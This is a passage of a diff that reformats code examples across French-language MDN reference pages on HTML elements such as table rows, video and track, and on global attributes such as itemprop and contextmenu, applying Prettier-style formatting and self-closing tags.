+<p>Le concert a lieu <time datetime="2001-05-15T19:00">le 15 mai</time>.</p>
 ```
 
 #### Résultat

--- a/files/fr/web/html/element/title/index.md
+++ b/files/fr/web/html/element/title/index.md
@@ -53,7 +53,10 @@ Mettre à jour la valeur de `title` afin de refléter un changement d'état impo
 #### Exemple
 
 ```html
-<title>2 erreurs sur votre commande - Restaurant chinois Maison bleue - Commande en ligne</title>
+<title>
+  2 erreurs sur votre commande - Restaurant chinois Maison bleue - Commande en
+  ligne
+</title>
 ```
 
 - [Comprendre les règles WCAG 2.4](/fr/docs/Web/Accessibility/Understanding_WCAG/Operable#Guideline_2.4_—_Navigable_Provide_ways_to_help_users_navigate_find_content_and_determine_where_they_are)

--- a/files/fr/web/html/element/tr/index.md
+++ b/files/fr/web/html/element/tr/index.md
@@ -86,13 +86,16 @@ Voir [la page sur `<table>`](/fr/docs/Web/HTML/Element/table) pour d'autres exem
 ```html
 <table>
   <tr>
-    <th>Prénom</th><th>Nom</th>
+    <th>Prénom</th>
+    <th>Nom</th>
   </tr>
   <tr>
-    <td>Jean</td> <td>Biche</td>
+    <td>Jean</td>
+    <td>Biche</td>
   </tr>
   <tr>
-    <td>Marcel</td> <td>Patulacci</td>
+    <td>Marcel</td>
+    <td>Patulacci</td>
   </tr>
 </table>
 ```
@@ -106,7 +109,8 @@ table {
   border: 1px solid black;
 }
 
-th, td {
+th,
+td {
   border: 1px solid black;
 }
 ```
@@ -176,7 +180,8 @@ table {
   border: 1px solid black;
 }
 
-th, td {
+th,
+td {
   border: 1px solid black;
 }
 ```
@@ -234,7 +239,8 @@ table {
   border: 1px solid black;
 }
 
-th, td {
+th,
+td {
   border: 1px solid black;
 }
 ```
@@ -304,16 +310,21 @@ Là encore, regardons le résultat pour commencer.
 ```css
 table {
   border: 1px solid black;
-  font: 16px "Open Sans", Helvetica, Arial, sans-serif;
+  font:
+    16px "Open Sans",
+    Helvetica,
+    Arial,
+    sans-serif;
 }
 
 thead > tr {
   background-color: rgb(228, 240, 245);
 }
 
-th, td {
+th,
+td {
   border: 1px solid black;
-  padding:4px 6px;
+  padding: 4px 6px;
 }
 ```
 
@@ -384,7 +395,11 @@ Ici, CSS est utilisé de façon plus marquée. Sans que ce soit compliqué, il y
 ```css
 table {
   border: 1px solid black;
-  font: 16px "Open Sans", Helvetica, Arial, sans-serif;
+  font:
+    16px "Open Sans",
+    Helvetica,
+    Arial,
+    sans-serif;
   border-spacing: 0;
   border-collapse: collapse;
 }
@@ -393,9 +408,10 @@ table {
 Ici, on ajoute les propriétés [`border-spacing`](/fr/docs/Web/CSS/border-spacing) et [`border-collapse`](/fr/docs/Web/CSS/border-collapse) afin d'éliminer l'espace entre les cellules et afin de fusionner les bordures qui se touchent afin d'obtenir une seule bordure plutôt que des bordures doubles.
 
 ```css
-th, td {
+th,
+td {
   border: 1px solid black;
-  padding:4px 6px;
+  padding: 4px 6px;
 }
 
 th {
@@ -466,7 +482,7 @@ Enfin, lorsqu'on affiche des valeurs monétaires, on les représente alignées �
 
 ```css
 tbody > tr > td:last-of-type {
-  text-align:right;
+  text-align: right;
 }
 ```
 

--- a/files/fr/web/html/element/track/index.md
+++ b/files/fr/web/html/element/track/index.md
@@ -99,22 +99,18 @@ Un élément média ([`<audio>`](/fr/docs/Web/HTML/Element/audio) ou [`<video>`]
 
 ```html
 <video controls poster="/images/sample.gif">
-  <source src="sample.mp4" type="video/mp4">
-  <source src="sample.ogv" type="video/ogv">
-  <track kind="captions" src="sampleCaptions.vtt" srclang="en">
-  <track kind="descriptions"
-    src="sampleDescriptions.vtt" srclang="en">
-  <track kind="chapters" src="chapitres.vtt" srclang="en">
-  <track kind="subtitles" src="soustitres_de.vtt" srclang="de">
-  <track kind="subtitles" src="soustitres_en.vtt" srclang="en">
-  <track kind="subtitles" src="soustitres_ja.vtt" srclang="ja">
-  <track kind="subtitles" src="soustitres_oz.vtt" srclang="oz">
-  <track kind="metadata" src="keyStage1.vtt" srclang="en"
-    label="Key Stage 1">
-  <track kind="metadata" src="keyStage2.vtt" srclang="en"
-    label="Key Stage 2">
-  <track kind="metadata" src="keyStage3.vtt" srclang="en"
-    label="Key Stage 3">
+  <source src="sample.mp4" type="video/mp4" />
+  <source src="sample.ogv" type="video/ogv" />
+  <track kind="captions" src="sampleCaptions.vtt" srclang="en" />
+  <track kind="descriptions" src="sampleDescriptions.vtt" srclang="en" />
+  <track kind="chapters" src="chapitres.vtt" srclang="en" />
+  <track kind="subtitles" src="soustitres_de.vtt" srclang="de" />
+  <track kind="subtitles" src="soustitres_en.vtt" srclang="en" />
+  <track kind="subtitles" src="soustitres_ja.vtt" srclang="ja" />
+  <track kind="subtitles" src="soustitres_oz.vtt" srclang="oz" />
+  <track kind="metadata" src="keyStage1.vtt" srclang="en" label="Key Stage 1" />
+  <track kind="metadata" src="keyStage2.vtt" srclang="en" label="Key Stage 2" />
+  <track kind="metadata" src="keyStage3.vtt" srclang="en" label="Key Stage 3" />
   <!-- Contenu alternatif pour les navigateurs qui
       ne prennent pas en charge <video> -->
   <!-- etc. -->

--- a/files/fr/web/html/element/tt/index.md
+++ b/files/fr/web/html/element/tt/index.md
@@ -43,8 +43,7 @@ Il est possible de surcharger la police par défaut utilisée pour cet élément
 
 ```css
 tt {
-  font-family: "Lucida Console", "Menlo", "Monaco", "Courier",
-               monospace;
+  font-family: "Lucida Console", "Menlo", "Monaco", "Courier", monospace;
 }
 ```
 

--- a/files/fr/web/html/element/u/index.md
+++ b/files/fr/web/html/element/u/index.md
@@ -84,7 +84,7 @@ Pour souligner du texte sans que cela ait une quelconque portée sémantique, on
 
 ```html
 <span class="underline">Le plat du jour</span>
-<br>
+<br />
 Soupe de potiron avec un soupçon de noix de muscade
 ```
 

--- a/files/fr/web/html/element/ul/index.md
+++ b/files/fr/web/html/element/ul/index.md
@@ -65,21 +65,24 @@ L'élément HTML **`<ul>`** représente une liste d'éléments sans ordre partic
 ```html
 <ul>
   <li>1 artichaut</li>
-  <li>Les trucs pour le gateau
-  <!-- On voit que </li> n'est pas là -->
+  <li>
+    Les trucs pour le gateau
+    <!-- On voit que </li> n'est pas là -->
     <ul>
       <li>3 oeufs</li>
-      <li>La génoise
-      <!-- Là on ouvre une autre liste -->
+      <li>
+        La génoise
+        <!-- Là on ouvre une autre liste -->
         <ul>
           <li>100g de sucre</li>
           <li>1 oeuf</li>
           <li>150g de farine</li>
         </ul>
-      </li> <!-- On ferme la liste la plus imbriquée -->
+      </li>
+      <!-- On ferme la liste la plus imbriquée -->
       <li>200g de chocolat</li>
     </ul>
-  <!-- On ferme la liste imbriquée avec </li> -->
+    <!-- On ferme la liste imbriquée avec </li> -->
   </li>
   <li>De l'essuie-tout</li>
 </ul>
@@ -96,7 +99,8 @@ L'élément HTML **`<ul>`** représente une liste d'éléments sans ordre partic
 ```html
 <ul>
   <li>Lire un livre</li>
-  <li>Préparer une soupe
+  <li>
+    Préparer une soupe
     <ol>
       <li>Couper les légumes</li>
       <li>Mettre dans l'eau et cuire</li>

--- a/files/fr/web/html/element/var/index.md
+++ b/files/fr/web/html/element/var/index.md
@@ -32,7 +32,10 @@ La plupart des navigateurs appliquent la propriété {{cssxref("font-style")}} a
 
 ```css
 var {
-  font: bold 15px "Courier", "Courier New", monospace;
+  font:
+    bold 15px "Courier",
+    "Courier New",
+    monospace;
 }
 ```
 
@@ -59,7 +62,10 @@ var {
 
 ```css
 var {
-  font: bold 15px "Courier", "Courier New", monospace;
+  font:
+    bold 15px "Courier",
+    "Courier New",
+    monospace;
 }
 ```
 
@@ -68,8 +74,8 @@ var {
 ```html
 <p>
   Les variables <var>minSpeed</var> et <var>maxSpeed</var> contrôlent les
-  vitesses minimale et maximale de l'appareil et sont exprimées en tours
-  par minute.
+  vitesses minimale et maximale de l'appareil et sont exprimées en tours par
+  minute.
 </p>
 ```
 

--- a/files/fr/web/html/element/video/index.md
+++ b/files/fr/web/html/element/video/index.md
@@ -18,10 +18,12 @@ Les navigateurs ne prennent pas en charge [l'ensemble des formats vidéo](/fr/do
 
 ```html
 <video controls>
-  <source src="maVideo.mp4" type="video/mp4">
-  <source src="maVideo.webm" type="video/webm">
-  <p>Votre navigateur ne prend pas en charge les vidéos HTML5.
-     Voici <a href="myVideo.mp4">un lien pour télécharger la vidéo</a>.</p>
+  <source src="maVideo.mp4" type="video/mp4" />
+  <source src="maVideo.webm" type="video/webm" />
+  <p>
+    Votre navigateur ne prend pas en charge les vidéos HTML5. Voici
+    <a href="myVideo.mp4">un lien pour télécharger la vidéo</a>.
+  </p>
 </video>
 ```
 
@@ -106,29 +108,29 @@ Pour apprendre les bases concernant `<video>`, nous vous conseillons de consulte
 
 ## Évènements
 
-| Nom                                                                                                                      | Condition de déclenchement                                                                                                                                                                                                          |
-| ------------------------------------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| {{domxref("ScriptProcessorNode.audioprocess_event","audioprocess")}}{{Deprecated_Inline}} | La mémoire tampon en entrée d'un {{DOMxRef("ScriptProcessorNode")}} peut désormais être traité.                                                                                                                           |
-| {{domxref("HTMLMediaElement.canplay_event", 'canplay')}}                                             | Le navigateur peut lire le média mais estime que trop peu de données ont été chargées pour lire le média jusqu'à sa fin (il faudra vraisemblablement un arrêt pour un chargement en mémoire tampon).                                |
-| {{domxref("HTMLMediaElement.canplaythrough_event", 'canplaythrough')}}                             | Le navigateur estime qu'il peut lire le média jusqu'à sa fin, sans avoir à interrompre la lecture par du chargement en mémoire tampon.                                                                                              |
-| {{domxref("OfflineAudioContext.complete_event", "complete")}}                                         | Le rendu d'un {{DOMxRef("OfflineAudioContext")}} est terminé.                                                                                                                                                             |
-| {{domxref("HTMLMediaElement.durationchange_event", 'durationchange')}}                             | L'attribut `duration` a été mis à jour.                                                                                                                                                                                             |
-| {{domxref("HTMLMediaElement.emptied_event", 'emptied')}}                                             | Le média est devenu vide. Cela peut par exemple se produire lorsque le média a déjà été (partiellement ou complètement) chargé et que la méthode [`load()`](/fr/docs/Web/API/HTMLMediaElement/load) est invoquée pour le recharger. |
-| {{domxref("HTMLMediaElement.ended_event", 'ended')}}                                                     | La lecture a été interrompue car la fin du média est atteinte.                                                                                                                                                                      |
-| {{domxref("HTMLMediaElement.loadeddata_event", 'loadeddata')}}                                     | La première _frame_ du média a été chargée.                                                                                                                                                                                         |
-| {{domxref("HTMLMediaElement.loadedmetadata_event", 'loadedmetadata')}}                             | Les métadonnées ont été chargées.                                                                                                                                                                                                   |
-| {{domxref("HTMLMediaElement.pause_event", 'pause')}}                                                     | La lecture a été mise en pause.                                                                                                                                                                                                     |
-| {{domxref("HTMLMediaElement.play_event", 'play')}}                                                     | La lecture a démarré.                                                                                                                                                                                                               |
-| {{domxref("HTMLMediaElement.playing_event", 'playing ')}}                                             | La lecture est prête à être lancée après avoir été mise en pause ou interrompue pour un chargement en mémoire de données.                                                                                                           |
-| {{domxref("HTMLMediaElement.progress_event", 'progress')}}                                             | Évènement déclenché périodiquement lorsque le navigateur charge une ressource.                                                                                                                                                      |
-| {{domxref("HTMLMediaElement.ratechange_event", 'ratechange')}}                                     | La vitesse de lecture a changé.                                                                                                                                                                                                     |
-| {{domxref("HTMLMediaElement.seeked_event", 'seeked')}}                                                 | Une opération de déplacement du curseur de lecture (_seek_) est terminée.                                                                                                                                                           |
-| {{domxref("HTMLMediaElement.seeking_event", 'seeking')}}                                             | L'agent utilisateur tente de récupérer les données associées au média mais les données ne parviennent pas.                                                                                                                          |
-| {{domxref("HTMLMediaElement.stalled_event", 'stalled')}}                                             | L'agent utilisateur tente de récupérer les données associées au média mais les données ne parviennent pas.                                                                                                                          |
-| {{domxref("HTMLMediaElement.suspend_event", 'suspend')}}                                             | Le chargement des données du média ont été suspendues.                                                                                                                                                                              |
-| {{domxref("HTMLMediaElement.timeupdate_event", 'timeupdate')}}                                     | Le temps décrit par l'attribut `currentTime` a été mis à jour.                                                                                                                                                                      |
-| {{domxref("HTMLMediaElement.volumechange_event", 'volumechange')}}                                 | Le volume a été modifié.                                                                                                                                                                                                            |
-| {{domxref("HTMLMediaElement.waiting_event", 'waiting')}}                                             | La lecture a été interrompue en raison d'un manque temporaire de données.                                                                                                                                                           |
+| Nom                                                                                       | Condition de déclenchement                                                                                                                                                                                                          |
+| ----------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| {{domxref("ScriptProcessorNode.audioprocess_event","audioprocess")}}{{Deprecated_Inline}} | La mémoire tampon en entrée d'un {{DOMxRef("ScriptProcessorNode")}} peut désormais être traité.                                                                                                                                     |
+| {{domxref("HTMLMediaElement.canplay_event", 'canplay')}}                                  | Le navigateur peut lire le média mais estime que trop peu de données ont été chargées pour lire le média jusqu'à sa fin (il faudra vraisemblablement un arrêt pour un chargement en mémoire tampon).                                |
+| {{domxref("HTMLMediaElement.canplaythrough_event", 'canplaythrough')}}                    | Le navigateur estime qu'il peut lire le média jusqu'à sa fin, sans avoir à interrompre la lecture par du chargement en mémoire tampon.                                                                                              |
+| {{domxref("OfflineAudioContext.complete_event", "complete")}}                             | Le rendu d'un {{DOMxRef("OfflineAudioContext")}} est terminé.                                                                                                                                                                       |
+| {{domxref("HTMLMediaElement.durationchange_event", 'durationchange')}}                    | L'attribut `duration` a été mis à jour.                                                                                                                                                                                             |
+| {{domxref("HTMLMediaElement.emptied_event", 'emptied')}}                                  | Le média est devenu vide. Cela peut par exemple se produire lorsque le média a déjà été (partiellement ou complètement) chargé et que la méthode [`load()`](/fr/docs/Web/API/HTMLMediaElement/load) est invoquée pour le recharger. |
+| {{domxref("HTMLMediaElement.ended_event", 'ended')}}                                      | La lecture a été interrompue car la fin du média est atteinte.                                                                                                                                                                      |
+| {{domxref("HTMLMediaElement.loadeddata_event", 'loadeddata')}}                            | La première _frame_ du média a été chargée.                                                                                                                                                                                         |
+| {{domxref("HTMLMediaElement.loadedmetadata_event", 'loadedmetadata')}}                    | Les métadonnées ont été chargées.                                                                                                                                                                                                   |
+| {{domxref("HTMLMediaElement.pause_event", 'pause')}}                                      | La lecture a été mise en pause.                                                                                                                                                                                                     |
+| {{domxref("HTMLMediaElement.play_event", 'play')}}                                        | La lecture a démarré.                                                                                                                                                                                                               |
+| {{domxref("HTMLMediaElement.playing_event", 'playing ')}}                                 | La lecture est prête à être lancée après avoir été mise en pause ou interrompue pour un chargement en mémoire de données.                                                                                                           |
+| {{domxref("HTMLMediaElement.progress_event", 'progress')}}                                | Évènement déclenché périodiquement lorsque le navigateur charge une ressource.                                                                                                                                                      |
+| {{domxref("HTMLMediaElement.ratechange_event", 'ratechange')}}                            | La vitesse de lecture a changé.                                                                                                                                                                                                     |
+| {{domxref("HTMLMediaElement.seeked_event", 'seeked')}}                                    | Une opération de déplacement du curseur de lecture (_seek_) est terminée.                                                                                                                                                           |
+| {{domxref("HTMLMediaElement.seeking_event", 'seeking')}}                                  | L'agent utilisateur tente de récupérer les données associées au média mais les données ne parviennent pas.                                                                                                                          |
+| {{domxref("HTMLMediaElement.stalled_event", 'stalled')}}                                  | L'agent utilisateur tente de récupérer les données associées au média mais les données ne parviennent pas.                                                                                                                          |
+| {{domxref("HTMLMediaElement.suspend_event", 'suspend')}}                                  | Le chargement des données du média ont été suspendues.                                                                                                                                                                              |
+| {{domxref("HTMLMediaElement.timeupdate_event", 'timeupdate')}}                            | Le temps décrit par l'attribut `currentTime` a été mis à jour.                                                                                                                                                                      |
+| {{domxref("HTMLMediaElement.volumechange_event", 'volumechange')}}                        | Le volume a été modifié.                                                                                                                                                                                                            |
+| {{domxref("HTMLMediaElement.waiting_event", 'waiting')}}                                  | La lecture a été interrompue en raison d'un manque temporaire de données.                                                                                                                                                           |
 
 ## Notes d'utilisation
 
@@ -154,11 +156,11 @@ Le fragment de code qui suit, par exemple, permettra d'appeler une fonction donn
 ```js
 var elem = document.querySelector("video");
 
-elem.audioTrackList.onaddtrack = function(event) {
+elem.audioTrackList.onaddtrack = function (event) {
   trackEditor.addTrack(event.track);
 };
 
-elem.audioTrackList.onremovetrack = function(event) {
+elem.audioTrackList.onremovetrack = function (event) {
   trackEditor.removeTrack(event.track);
 };
 ```
@@ -172,17 +174,14 @@ On peut aussi utiliser la méthode {{domxref("EventTarget.addEventListener", "ad
 ```html
 <!-- Un exemple simple -->
 <video src="fichiervideo.webm" autoplay poster="vignette.jpg">
-  Votre navigateur ne permet pas de lire les vidéos.
-  Mais vous pouvez toujours
+  Votre navigateur ne permet pas de lire les vidéos. Mais vous pouvez toujours
   <a href="fichiervideo.webm">la télécharger</a> !
 </video>
 
 <!-- Une vidéo avec des sous-titres -->
 <video src="toto.webm">
-  <track kind="subtitles" src="toto.en.vtt" srclang="en"
-    label="Anglais">
-  <track kind="subtitles" src="toto.sv.vtt" srclang="sv"
-    label="Suédois">
+  <track kind="subtitles" src="toto.en.vtt" srclang="en" label="Anglais" />
+  <track kind="subtitles" src="toto.sv.vtt" srclang="sv" label="Suédois" />
 </video>
 ```
 
@@ -195,17 +194,19 @@ Dans le deuxième exemple, l'utilisateur peut choisir parmi deux pistes de sous-
 Dans cet exemple, trois sources différentes pour la vidéo sont fournies. La première source utilisée est WebM, si son format n'est pas lisible pour le navigateur, c'est le fichier MP4 qui sera utilisé et si celui-ci n'est pas lisible non plus, ce sera le fichier OGG qui sera exploité.
 
 ```html
-<video width="480" controls
-  poster="https://archive.org/download/WebmVp8Vorbis/webmvp8.gif" >
+<video
+  width="480"
+  controls
+  poster="https://archive.org/download/WebmVp8Vorbis/webmvp8.gif">
   <source
     src="https://archive.org/download/WebmVp8Vorbis/webmvp8.webm"
-    type="video/webm">
+    type="video/webm" />
   <source
     src="https://archive.org/download/WebmVp8Vorbis/webmvp8_512kb.mp4"
-    type="video/mp4">
+    type="video/mp4" />
   <source
     src="https://archive.org/download/WebmVp8Vorbis/webmvp8.ogv"
-    type="video/ogg">
+    type="video/ogg" />
   Votre navigateur ne permet pas de lire les vidéos HTML5.
 </video>
 ```

--- a/files/fr/web/html/element/wbr/index.md
+++ b/files/fr/web/html/element/wbr/index.md
@@ -25,7 +25,9 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 ### HTML
 
 ```html
-<p>http://voici<wbr>.une<wbr>.très<wbr>.très<wbr>.longue<wbr>.URL<wbr>.com/avec<wbr>/pleins<wbr>/de<wbr>/niveaux<wbr>/de<wbr>/pages</p>
+<p>
+  http://voici<wbr />.une<wbr />.très<wbr />.très<wbr />.longue<wbr />.URL<wbr />.com/avec<wbr />/pleins<wbr />/de<wbr />/niveaux<wbr />/de<wbr />/pages
+</p>
 ```
 
 ### Résultat

--- a/files/fr/web/html/global_attributes/autofocus/index.md
+++ b/files/fr/web/html/global_attributes/autofocus/index.md
@@ -9,7 +9,7 @@ translation_of: Web/HTML/Global_attributes/autofocus
 [L'attribut global](/fr/docs/Web/HTML/Global_attributes) **`autofocus`** est un attribut booléen indiquant qu'un élément devrait recevoir le focus au chargement de la page ou lorsque l'élément {{HTMLElement("dialog")}} dont il fait éventuellement partie est affiché.
 
 ```html
-<input name="q" autofocus>
+<input name="q" autofocus />
 ```
 
 L'attribut `autofocus` ne devrait pas être placé sur plus d'un élément au sein du document. S'il est placé sur plusieurs éléments, c'est le premier qui recevra le focus.

--- a/files/fr/web/html/global_attributes/contextmenu/index.md
+++ b/files/fr/web/html/global_attributes/contextmenu/index.md
@@ -28,18 +28,34 @@ Voici quelques exemples de personnalisations de menus. Le code HTML pourra être
   </menu>
   <ol>
     <li>
-      Dans cet exemple, vous pouvez partager un lien vers
-      cette page sur Facebook et/ou Twitter via le groupe Partager
-                du menu contextuel
+      Dans cet exemple, vous pouvez partager un lien vers cette page sur
+      Facebook et/ou Twitter via le groupe Partager du menu contextuel
     </li>
-    <li>Sur cette ligne : on peut partager la page sur Twitter ou Facebook grâce au menu Partager du menu contextuel.</li>
-    <li><pre contextmenu="changeFont" id="fontSizing">Sur cette ligne : on peut changer la taille de la police en utilisant les options "Augmenter/Réduire la taille de la police" du menu contextuel</pre></li>
+    <li>
+      Sur cette ligne : on peut partager la page sur Twitter ou Facebook grâce
+      au menu Partager du menu contextuel.
+    </li>
+    <li>
+      <pre contextmenu="changeFont" id="fontSizing">
+Sur cette ligne : on peut changer la taille de la police en utilisant les options "Augmenter/Réduire la taille de la police" du menu contextuel</pre
+      >
+    </li>
     <menu type="context" id="changeFont">
-      <menuitem label="Augmenter la taille de la police" onclick="incFont()"></menuitem>
-      <menuitem label="Réduire la taille de la police" onclick="decFont()"></menuitem>
+      <menuitem
+        label="Augmenter la taille de la police"
+        onclick="incFont()"></menuitem>
+      <menuitem
+        label="Réduire la taille de la police"
+        onclick="decFont()"></menuitem>
     </menu>
-    <li contextmenu="ChangeImage" id="changeImage">Sur cette ligne : on peut utiliser l'option "Changer l'image" du menu.</li><br />
-    <img src="https://developer.mozilla.org/media/img/promote/promobutton_mdn5.png" contextmenu="ChangeImage" id="promoButton" />
+    <li contextmenu="ChangeImage" id="changeImage">
+      Sur cette ligne : on peut utiliser l'option "Changer l'image" du menu.
+    </li>
+    <br />
+    <img
+      src="https://developer.mozilla.org/media/img/promote/promobutton_mdn5.png"
+      contextmenu="ChangeImage"
+      id="promoButton" />
     <menu type="context" id="ChangeImage">
       <menuitem label="Changer l'image" onclick="changeImage()"></menuitem>
     </menu>
@@ -51,25 +67,32 @@ Voici quelques exemples de personnalisations de menus. Le code HTML pourra être
 
 ```js
 function shareViaTwitter() {
-  window.open("https://twitter.com/intent/tweet?text=" +
-      "Je découvre ContextMenu avec MDN.");
+  window.open(
+    "https://twitter.com/intent/tweet?text=" +
+      "Je découvre ContextMenu avec MDN.",
+  );
 }
 
 function shareViaFacebook() {
-  window.open("https://facebook.com/sharer/sharer.php?u=" +
-      "https://developer.mozilla.org/fr/docs/Web/HTML/Attributs_universels/contextmenu");
+  window.open(
+    "https://facebook.com/sharer/sharer.php?u=" +
+      "https://developer.mozilla.org/fr/docs/Web/HTML/Attributs_universels/contextmenu",
+  );
 }
-function incFont(){
-  document.getElementById("fontSizing").style.fontSize="larger";
-}
-
-function decFont(){
-  document.getElementById("fontSizing").style.fontSize="smaller";
+function incFont() {
+  document.getElementById("fontSizing").style.fontSize = "larger";
 }
 
-function changeImage(){
-  var j = Math.ceil((Math.random()*39)+1);
-  document.images[0].src="https://developer.mozilla.org/media/img/promote/promobutton_mdn" + j + ".png";
+function decFont() {
+  document.getElementById("fontSizing").style.fontSize = "smaller";
+}
+
+function changeImage() {
+  var j = Math.ceil(Math.random() * 39 + 1);
+  document.images[0].src =
+    "https://developer.mozilla.org/media/img/promote/promobutton_mdn" +
+    j +
+    ".png";
 }
 ```
 

--- a/files/fr/web/html/global_attributes/index.md
+++ b/files/fr/web/html/global_attributes/index.md
@@ -92,6 +92,7 @@ En plus des attributs universels HTML, il existe également les attributs univer
 - `slot`
   - : Cet attribut affecte un créneau de l'arbre du _[shadow DOM](/fr/docs/Web/Web_Components/Shadow_DOM)_ pour un élément. L'élément ayant l'attribut `slot` est affecté au créneau créé par l'élément {{HTMLElement("slot")}} pour lequel l'attribut [`name`](/fr/docs/Web/HTML/Element/slot#name) correspond à la valeur de l'attribut `slot`.
 - `spellcheck` {{experimental_inline}}
+
   - : Un attribut à valeur contrainte qui définit s'il faut détecter les fautes d'orthographe/grammaire dans le texte de l'élément. Les valeurs autorisées pour cet attribut sont :
 
     - `true` qui indique que, si possible, il faut vérifier les erreurs d'orthographe

--- a/files/fr/web/html/global_attributes/itemid/index.md
+++ b/files/fr/web/html/global_attributes/itemid/index.md
@@ -27,13 +27,17 @@ itemid="URN"
 Un élément qui décrit un livre :
 
 ```html
-<dl itemscope
-    itemtype="http://vocab.example.net/book"
-    itemid="urn:isbn:0-330-34032-8">
- <dt>Title <dd itemprop="title">The Reality Dysfunction
- <dt>Author <dd itemprop="author">Peter F. Hamilton
- <dt>Publication date
- <dd><time itemprop="pubdate" datetime="1996-01-26">26 January 1996</time> </dl>
+<dl
+  itemscope
+  itemtype="http://vocab.example.net/book"
+  itemid="urn:isbn:0-330-34032-8">
+  <dt>Title</dt>
+  <dd itemprop="title">The Reality Dysfunction</dd>
+  <dt>Author</dt>
+  <dd itemprop="author">Peter F. Hamilton</dd>
+  <dt>Publication date</dt>
+  <dd><time itemprop="pubdate" datetime="1996-01-26">26 January 1996</time></dd>
+</dl>
 ```
 
 ### Données structurées correspondantes

--- a/files/fr/web/html/global_attributes/itemprop/index.md
+++ b/files/fr/web/html/global_attributes/itemprop/index.md
@@ -15,13 +15,15 @@ L'[attribut universel](/fr/docs/Web/HTML/Attributs_universels) **`itemprop`** es
 ```html
 <div itemscope itemtype="http://schema.org/Movie">
   <h1 itemprop="name">Avatar</h1>
-  <span>Director:
+  <span
+    >Director:
     <span itemprop="director">James Cameron</span>
     (born August 16, 1954)
   </span>
   <span itemprop="genre">Science fiction</span>
-  <a href="../movies/avatar-theatrical-trailer.html"
-    itemprop="trailer">Trailer</a>
+  <a href="../movies/avatar-theatrical-trailer.html" itemprop="trailer"
+    >Trailer</a
+  >
 </div>
 ```
 
@@ -72,15 +74,9 @@ Les valeurs des propriétés sont généralement des chaînes de caractères ou 
 
 ```html
 <div itemscope>
- <p>My name is
-   <span itemprop="name">Neil</span>.
- </p>
- <p>My band is called
-   <span itemprop="band">Four Parts Water</span>.
- </p>
- <p>I am
-   <span itemprop="nationality">British</span>.
- </p>
+  <p>My name is <span itemprop="name">Neil</span>.</p>
+  <p>My band is called <span itemprop="band">Four Parts Water</span>.</p>
+  <p>I am <span itemprop="nationality">British</span>.</p>
 </div>
 ```
 
@@ -88,8 +84,7 @@ Les valeurs des propriétés sont généralement des chaînes de caractères ou 
 
 ```html
 <div itemscope>
- <img itemprop="image"
-  src="google-logo.png" alt="Google">
+  <img itemprop="image" src="google-logo.png" alt="Google" />
 </div>
 ```
 
@@ -97,8 +92,7 @@ Les valeurs des propriétés sont généralement des chaînes de caractères ou 
 
 ```html
 <h1 itemscope>
- <data itemprop="product-id"
-  value="9678AOU879">The Instigator 2000</data>
+  <data itemprop="product-id" value="9678AOU879">The Instigator 2000</data>
 </h1>
 ```
 
@@ -108,18 +102,17 @@ Lorsqu'une chaîne est décrite avec un format machine plutôt qu'un format « h
 
 ```html
 <div itemscope itemtype="http://schema.org/Product">
- <span itemprop="name">
-   Panasonic White 60L Refrigerator
- </span>
- <img src="panasonic-fridge-60l-white.jpg" alt="">
-  <div itemprop="aggregateRating"
-       itemscope
-       itemtype="http://schema.org/AggregateRating">
-   <meter itemprop="ratingValue" min=0 value=3.5 max=5>
-     Rated 3.5/5
-   </meter>
-   (based on <span itemprop="reviewCount">11</span>
-   customer reviews)
+  <span itemprop="name"> Panasonic White 60L Refrigerator </span>
+  <img src="panasonic-fridge-60l-white.jpg" alt="" />
+  <div
+    itemprop="aggregateRating"
+    itemscope
+    itemtype="http://schema.org/AggregateRating">
+    <meter itemprop="ratingValue" min="0" value="3.5" max="5">
+      Rated 3.5/5
+    </meter>
+    (based on <span itemprop="reviewCount">11</span>
+    customer reviews)
   </div>
 </div>
 ```
@@ -130,10 +123,8 @@ Pour les données numériques, on peut utiliser l'élément {{HTMLElement("meter
 
 ```html
 <div itemscope>
- I was born on
- <time itemprop="birthday" datetime="2009-05-10">
-   May 10th 2009
- </time>.
+  I was born on
+  <time itemprop="birthday" datetime="2009-05-10"> May 10th 2009 </time>.
 </div>
 ```
 
@@ -143,15 +134,17 @@ Pour les valeurs temporelles, on utilisera les éléments {{HTMLElement("time")}
 
 ```html
 <div itemscope>
- <p>Name:
-   <span itemprop="name">Amanda</span>
- </p>
- <p>Band:
-   <span itemprop="band" itemscope>
-     <span itemprop="name">Jazz Band</span>
-    (<span itemprop="size">12</span> players)
-   </span>
- </p>
+  <p>
+    Name:
+    <span itemprop="name">Amanda</span>
+  </p>
+  <p>
+    Band:
+    <span itemprop="band" itemscope>
+      <span itemprop="name">Jazz Band</span>
+      (<span itemprop="size">12</span> players)
+    </span>
+  </p>
 </div>
 ```
 
@@ -166,8 +159,8 @@ L'élément de plus haut niveau possède deux propriétés `name` et `band`. La 
 <p id="a">Name: <span itemprop="name">Amanda</span></p>
 <div id="b" itemprop="band" itemscope itemref="c"></div>
 <div id="c">
- <p>Band: <span itemprop="name">Jazz Band</span></p>
- <p>Size: <span itemprop="size">12</span> players</p>
+  <p>Band: <span itemprop="name">Jazz Band</span></p>
+  <p>Size: <span itemprop="size">12</span> players</p>
 </div>
 ```
 
@@ -177,11 +170,11 @@ On obtient le même résultat qu'avec l'exemple précédent. Le premier objet po
 
 ```html
 <div itemscope>
- <p>Flavors in my favorite ice cream:</p>
- <ul>
-  <li itemprop="flavor">Lemon sorbet</li>
-  <li itemprop="flavor">Apricot sorbet</li>
- </ul>
+  <p>Flavors in my favorite ice cream:</p>
+  <ul>
+    <li itemprop="flavor">Lemon sorbet</li>
+    <li itemprop="flavor">Apricot sorbet</li>
+  </ul>
 </div>
 ```
 
@@ -191,9 +184,7 @@ Cet objet possède deux fois la même propriété `flavor`, qui prend deux valeu
 
 ```html
 <div itemscope>
- <span itemprop="favorite-color favorite-fruit">
-  orange
- </span>
+  <span itemprop="favorite-color favorite-fruit"> orange </span>
 </div>
 ```
 
@@ -203,23 +194,23 @@ On peut définir deux propriétés au même endroit si elles prennent la même v
 
 ```html
 <figure>
- <img src="castle.jpeg">
- <figcaption>
-  <span itemscope>
-    <span itemprop="name">The Castle</span>
-  </span>
-  (1986)
- </figcaption>
+  <img src="castle.jpeg" />
+  <figcaption>
+    <span itemscope>
+      <span itemprop="name">The Castle</span>
+    </span>
+    (1986)
+  </figcaption>
 </figure>
 ```
